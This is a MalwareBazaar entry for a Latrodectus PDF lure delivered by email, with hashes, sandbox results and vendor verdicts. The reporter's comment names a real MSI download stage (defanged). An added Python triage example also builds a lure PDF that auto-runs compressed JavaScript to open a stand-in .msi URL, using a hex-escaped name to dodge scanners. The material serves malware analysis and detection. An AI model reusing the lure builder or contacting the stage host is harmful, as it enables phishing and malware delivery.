MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Latrodectus


Vendor detections: 7



SHA256 hash: 2f7c4b3bddfcdd2992151c83f85d23fcb886035fb8f477e6c1caba134420bf2e
SHA3-384 hash: 129a91000db74530605349f4b1f55e0768846c2e8ba9223b021928366c70ca940437219c27487a850c8bb59da05691df
SHA1 hash: 87d57e35c6c2b224056a65a86ca565fa116702c7
MD5 hash: c48c883ccf4b2e18e23e576bbc8c6bba
humanhash: winner-illinois-salami-grey
File name: doc_inv_09-12#965.pdf
Signature: Latrodectus
File size: 355'012 bytes
First seen: 2024-09-12 19:37:51 UTC
Last seen: Never
File type: pdf
MIME type: application/pdf
ssdeep: 6144:tX3wNpjXAqv4pR68jNGiG8q7+RoyS2+F8H0vZDZwFQ/msuWG5QJI/C:tHwN5H4pRZjBGyS2+F8QlZ5gWBqC
TLSH: T1C7749E57A5F370DBE14884612704F43DA2D829BF53A259DC0DF8F90075AAFA13EBE189
Magika: pdf
Reporter: k3dg3___
Tags: Latrodectus pdf


Reporter comment (k3dg3):
PDF > JS > hxxp://193.203.203.40/vfs.msi
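Offline static triage of this kind of lure, as an added example; it is not MalwareBazaar's, the reporter's, or code from the sample. It recomputes the digests a MalwareBazaar entry lists so a downloaded file can be checked against the entry before any analysis, and then applies to raw PDF bytes the checks behind a "PDF > JS > URL" finding: flag the action names that make a document act rather than render (/OpenAction, /AA, /JavaScript, /JS, /Launch, /URI, /SubmitForm, /EmbeddedFile), inflate FlateDecode streams so compressed JavaScript is scanned too, resolve hex-escaped names (/J#53 is /JS) that defeat a naive grep, and extract and defang any URLs. The PDF it builds and the stage URL inside it (stage.example.invalid) are constructed for the example and are assumptions, not content of this sample.

```python
"""Offline triage helpers for a PDF lure of the kind in this entry.

Added example, not MalwareBazaar's or the reporter's code. The embedded PDF and
its URL are constructed here; they are not taken from the sample.
"""
import hashlib
import re
import zlib

# PDF names that make a document act rather than merely render.
ACTION_NAMES = (b"OpenAction", b"AA", b"JavaScript", b"JS", b"Launch",
                b"URI", b"SubmitForm", b"EmbeddedFile")
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
_URL = re.compile(rb"https?://[^\s\"'<>()]+")


def hashes_of(data: bytes) -> dict:
    """Digests as listed on a MalwareBazaar entry (fuzzy hashes excluded)."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def matches_entry(data: bytes, expected_sha256: str) -> bool:
    """True if a downloaded file is the sample the entry describes."""
    return hashes_of(data)["sha256"] == expected_sha256.lower()


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every Flate stream so scans see hidden JS."""
    bodies = []
    for m in _STREAM.finditer(data):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-encoded or malformed: scan raw bytes only
    return data + b"\n" + b"\n".join(bodies)


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes in names: /J#53 -> /JS, /Open#41ction -> /OpenAction."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def defang(url: str) -> str:
    """hxxp://host[.]tld form so the indicator cannot be clicked by accident."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def triage_pdf(data: bytes) -> dict:
    """Static indicators: action names present and defanged URLs found."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("no %PDF- header: do not trust the .pdf extension")
    view = normalize_names(inflate_streams(data))
    actions = sorted(n.decode() for n in ACTION_NAMES
                     if re.search(rb"/" + n + rb"(?![A-Za-z])", view))
    urls = sorted({u.decode("latin-1") for u in _URL.findall(view)})
    return {"actions": actions, "urls": [defang(u) for u in urls]}


def build_lure_pdf(url: str) -> bytes:
    """Constructed sample: /OpenAction runs Flate-compressed JS that opens `url`.
    /J#53 is the hex-escaped spelling of /JS used to dodge simple greps."""
    stream = zlib.compress(b'app.launchURL("%s", true);' % url.encode())
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /S /JavaScript /J#53 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(stream)
        + stream + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref))
    return bytes(out)


if __name__ == "__main__":
    # Assumed stage URL for the constructed lure, not the one from this entry.
    sample = build_lure_pdf("http://stage.example.invalid/vfs.msi")
    print(hashes_of(sample)["sha256"])
    print(triage_pdf(sample))
```

For a real download, read the file bytes and pass them to matches_entry together with the SHA256 from the entry before running triage_pdf. The scan is a string-level heuristic: objects packed into object streams (/ObjStm), filters other than Flate, and encrypted PDFs need a real parser such as pdf-parser or peepdf, so treat an empty result as "nothing found at this level", not as clean.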

Intelligence


File Origin
Number of uploads: 1
Number of downloads: 294
Origin country: US
Vendor Threat Intelligence
Verdict: Malicious
Score: 81.4%
Tags: Execution Infostealer Network Ransomware Stealth
Verdict: Unknown
Threat level: 2.5/10
Confidence: 89%
Tags: action Gathering data
Result
Verdict: UNKNOWN
Details: Document With Few Pages (document contains between one and three pages of content; most malicious documents are sparse in page count)
Result
Threat name: n/a
Detection: malicious
Classification: phis
Score: 48 / 100
Signatures: AI detected landing page (webpage, office document or email); Suspicious PDF detected (based on various text indicators)
Behaviour
Behavior Graph ID: 1510391 (sample doc_inv_09-12#965.pdf, start date 12/09/2024, architecture WINDOWS, score 48). Content recoverable from the graph image:
Signatures: Suspicious PDF detected (based on various text indicators); AI detected landing page (webpage, office document or email)
Processes started: chrome.exe (two instances, one spawning a child chrome.exe), Acrobat.exe (two instances), AcroCEF.exe (four instances, spawned by Acrobat.exe)
Dropped files: C:\Windows\SystemTemp\...\widevinecdm.dll (PE32+) and a second Widevine CDM DLL under C:\Windows\... (PE32+), both written by chrome.exe
Network: x1.i.lencr.org; 192.168.2.17 and 192.168.2.4 (private addresses); maxxtyre.com.br (198.58.102.144:443, LINODE-AP, US) and www.lindo.com (23.235.207.143:443, INMOTI-1, US), both contacted by chrome.exe; 23.195.92.153:443 (AKAMAI-AS, US), contacted by AcroCEF.exe; several other IPs or domains not shown
Note that the reporter's 193.203.203.40 does not appear in this graph: lencr.org is Let's Encrypt certificate infrastructure, the Widevine CDM DLLs are Chrome's own DRM component, and the remaining traffic belongs to the Chrome and Acrobat helper processes, so the sandbox run does not by itself show the MSI download stage.
Threat name: Win32.Trojan.Vigorf
Status: Malicious
First seen: 2024-09-12 19:38:08 UTC
File Type: Document
Extracted files: 1
AV detection: 7 of 24 (29.17%)
Threat level: 5/5
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Detect_APT29_WINELOADER_Backdoor
Author: daniyyell
Description: Detects APT29's WINELOADER backdoor variant used in phishing campaigns; this rule also detects bad pdf, shtml, htm and vbs files, or maybe more, depending
Reference: https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties
Given the author's own description, a hit on this rule is a broad document heuristic; on its own it does not tie this Latrodectus sample to APT29 or to WINELOADER.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via e-mail attachment

Comments